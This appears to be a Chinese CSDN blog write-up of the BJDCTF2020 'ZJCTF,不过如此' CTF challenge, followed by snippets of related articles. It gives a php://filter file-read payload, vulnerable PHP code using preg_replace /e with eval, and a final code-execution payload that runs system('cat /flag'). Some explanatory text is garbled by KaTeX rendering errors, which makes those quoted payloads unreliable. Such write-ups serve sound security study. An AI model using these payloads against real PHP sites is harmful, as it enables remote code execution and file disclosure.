[BJDCTF2020]ZJCTF,不过如此(preg_replace /e)

最新推荐文章于 2024-06-17 22:56:29 发布
最新推荐文章于 2024-06-17 22:56:29 发布
阅读量192 收藏
点赞数
分类专栏: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45577185/article/details/119423270
版权

知识点:
1.php伪协议小结(文件包含)
2.深入研究preg_replace与代码执行
3.php可变变量
在这里插入图片描述
看到//next.php;想个办法看下next.php

payload:

http://90812d78-a226-4cdf-be8f-8baa9961fb89.node3.buuoj.cn/?text=php://input&file=php://filter/convert.base64-encode/resource=next.php

I have a dream

在这里插入图片描述
base64解码:

<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;

function complex($re, $str) {
    return preg_replace(
        '/(' . $re . ')/ei',
        'strtolower("\\1")',
        $str
    );
}
foreach($_GET as $re => $str) {
    echo complex($re, $str). "\n";
}
function getFlag(){
	@eval($_GET['cmd']);
}

preg_replace($patterns, $replacements, $string);用法:
preg_replace(1 ,2, 3);
3中找1,通过正则把3中的1换成2

preg_replace 使用了 /e 模式,使第二个参数当作代码来执行,然而这里的第二个参数却固定为 ‘strtolower(“\1”)’ 字符串,当中的 \1 实际上就是 \1,这里的 \1 实际上指定的是第一个子匹配项。
官方 payload 为: /?.*={KaTeX parse error: Expected 'EOF', got '}' at position 12: {phpinfo()}}̲ ,即 GET 方式传入的参数…{phpinfo()}}

原先的语句: preg_replace('/(' . $regex . ')/ei', 'strtolower("\\1")', $value);
变成了语句: preg_replace('/(.*)/ei', 'strtolower("\\1")', {${phpinfo()}});

若不加{${}},phpinfo()只会被定义成字符串,加上后phpinfo()才是变量,可执行。
这是由于在PHP中,对于传入的非法的 KaTeX parse error: Undefined control sequence: \S at position 58: …* 变成了 _*。所以我们用 \̲S̲*={phpinfo()}。

payload:

\S%2b=${getFlag()}&cmd=system('cat /flag');

必须要经过foeach,因为函数不被调用不会被执行:
请添加图片描述

满月*
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[BJDCTF2020]ZJCTF不过如此(preg_replace /e 模式下的代码漏洞问题)
xlcvv的博客
04-30 607
题目给了源码: <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1>".file_ge...
[BJDCTF2020]ZJCTF不过如此(php伪协议,data伪协议,preg_replace /e漏洞)
weixin_44110537的博客
10-04 489
伪协议常用在文件包含漏洞中. 常见的文件包含函数有: include、require、include_once、require_once、highlight_file、show_source、file_get_contents、fopen、file、readfile. 具体的函数功能可以参考. 伪协议的学习 通过data协议构造 data://text/plain,I have a dream 通过php协议构造 php://filter/convert.base64-encode/resource=ne.
[BJDCTF2020]ZJCTF不过如此 preg_replace /e模式漏洞
m0_64180167的博客
09-11 431
直接看看代码首先 text file获取参数判断 text为空 和 读取 text的文件内容 并且要为 I have a dream这里可以使用data伪协议绕过 让 text识别到 I have a dream本地测试一下就知道了通过 data获取 I have a dream 得到该数据 这样 就可以绕过判断然后文件包含 提示我们 next.phpinclude很显然就是使用伪协议 我们直接php://来读取解密我们看看其中关键的内容。
[ctf web][BJDCTF2020]ZJCTF不过如此 writeup | preg_replace 函数/e模式命令执行
ShenZ的博客
08-16 288
[BJDCTF2020]ZJCTF不过如此 [BJDCTF2020]ZJCTF不过如此 wp preg_replace 函数/e模式命令执行 参考文章:https://www.cesafe.com/html/6999.html
preg_replace 代码执行漏洞之[BJDCTF2020]ZJCTF不过如此
qq_58970968的博客
07-14 273
file使用filephp//filter/read=convert.base64-encode/resource=文件名来构造;text使用data//text/plain,可以利用这个漏洞构造出命令执行漏洞;preg_replace/e模式下的。构造在next.php后。看到有flag列表,再打开;
[BJDCTF2020]ZJCTF不过如此
Sk1y的博客
03-31 4020
[BJDCTF2020]ZJCTF不过如此 题目: 解题过程 首先,进行代码审计 <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1>".file_get_contents($tex
[BJDCTF2020]ZJCTF不过如此(preg_replace的/e漏洞,PHP的特性)
qq_44657899的博客
05-16 1155
<?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1>".file_get_contents($text,'r')."</h1></br>"; if(preg_matc
BUUCTF:[BJDCTF2020]ZJCTF不过如此 && 攻防世界web之ics-05 -- -preg_replace + /e 的任意代码执行漏洞
Zero_Adam的博客
02-13 352
不足: 在文件包含那里卡住了,想着flag.php还是next.php10多分钟后才想到可以用filter协议来读么,,,等一会看看能不能用data协议来读去??? 这个可以的:index.php?text=data://text/plain,I have a dream&file=php://filter/convert.base64-encode/resource=next.php 看到正则+str_replace,+ e 修正符,想到的是RCE!?!!。 知识点:/e模式的preg_repl
[BJDCTF2020]ZJCTF不过如此1
最新发布
m0_73673698的博客
06-17 1052
简单分析一下这段代码,代码通过GET方法来传入text和file两个参数,并且传入的text参数通过file_get_contents函数以只读的方式打开,而且当它强等于"I have a dream"这个字符串是,才能够去输出并且去执行下面的那个if判断。也就是这段代码会遍历传入的GET参数,将GET传入的变量名给了$re,把变量名的值给了$str,那么这样在传入paylaod的时候preg_replace会变成。我们将返回的base64解码就是next.php的源码了,源码如下。
慎用preg_replace危险的/e修饰符(一句话后门常用)
12-18
preg_replace函数原型: mixed preg_replace ( mixed pattern, mixed replacement, mixed subject [, int limit]) 特别说明: /e 修正符使 preg_replace() 将 replacement 参数当作 PHP 代码(在适当的逆向引用替换...
PHP正则替换函数preg_replace和preg_replace_callback使用总结
12-18
使用 `preg_replace()` 加上 `/e` 修饰符,可以实现条件语句的替换: ```php $template = preg_replace("/\!\-\-\{if\s+(.+?)\}\-\-\>/e", "\$this->ifTag('\\1')", $template); ``` 这里的 `\$this->ifTag('\\1')...
php preg_match_all结合str_replace替换内容中所有img
10-30
在PHP编程中,`preg_match_all` 和 `str_replace` 是两个非常重要的字符串处理函数,它们经常被用来处理HTML或XML文档中的特定内容。在这个场景中,开发者需要从采集的数据中提取并替换`<img>`标签,以符合站点的...
[GXYCTF2019]BabyUpload 1 文件上传
weixin_45577185的博客
07-22 1890
源码: <?php session_start(); echo "<meta http-equiv=\"Content-Type\" content=\"textml; charset=utf-8\" /> <title>Upload</title> <form action=\"\" method=\"post\" enctype=\"multipart/form-data\"> 上传文件<input type=\"file\" name=\"
[GYCTF2020]FlaskApp 1(SSTI,PIN)
weixin_45577185的博客
10-20 1244
f12发现了提示,但是我对PIN没有了解所以没反应过来 扫了一下网站,发现了一个网站打开 非预期解: 本题存在SSTI注入 加密 {{7+7}} e3s3Kzd9fQ== 解密 回显14 说明是SSTI python-Flask模版注入攻击SSTI(python沙盒逃逸) 查看根目录: {% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init_
[BJDCTF2020]Easy MD5 1
weixin_45577185的博客
06-24 1089
bp抓包看到: select * from ‘admin’ where password=md5($pass,true) 查看一下md5()函数的true参数 和默认的输出不一样,百度一下MD5()true参数漏洞,发现可以找到 ffifdyop字符串会造成漏洞 ·在本地环境试验ffifdyop,输出的开头是’or’6xxxxxx 在数据库语句里就构成了select * from ‘admin’ where password= ''or’6xxxxxx ’ 相当于 password= ‘’ or 1.
[BJDCTF2020]Mark loves cat 1
weixin_45577185的博客
09-06 505
用dirb扫一下,发现源码泄露 dirb http://7036e761-e13f-483a-a1ed-6b0aa08562ed.node4.buuoj.cn:81/ 脚本获得源码 python GitHack.py http://7036e761-e13f-483a-a1ed-6b0aa08562ed.node4.buuoj.cn:81/ <?php include 'flag.php'; $yds = "dog"; $is = "cat"; $handsome = 'yds'; foreach(
[SWPU2019]Web1
weixin_45577185的博客
09-12 505
1.二次注入 2.bypass information_schema 3.无列名注入 bypass information_schema 尝试使用单引号判断是否存在注入 报错说明存在二次注入 题目环境过滤了空格,我们使用/**/来进行绕过。过滤了or,因此我们无法使用order by 以及information_schema这个库。因为过滤了注释符,所以查询语句的最后我们要闭合单引号 本题在但是比赛中 bypass information_schema 是利用的 sys.schema_auto_incr
[极客大挑战 2019]FinalSQL 1
weixin_45577185的博客
10-12 424
开始试了试登录框,用sql注入,发现总是出现 后来发现url可能存在注入 通过bp,发现过滤了很多 输入11回显’ERROR’,10回显’NO! Not this! Click others~~~’ 由于空格被过滤,用()代替。 import requests url = 'http://279ed640-ef9f-410b-91f4-ac2f33bca34f.node4.buuoj.cn:81/search.php' flag = '' for i in range(1,250):# range.
preg_replace_all
06-06
可能是您误解了 `preg_replace` 函数的作用。`preg_replace` 函数会在字符串中使用正则表达式进行替换,并返回替换后的字符串。如果要替换所有匹配项,可以使用 `preg_replace` 函数的第四个参数 `$count`,将其设置...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值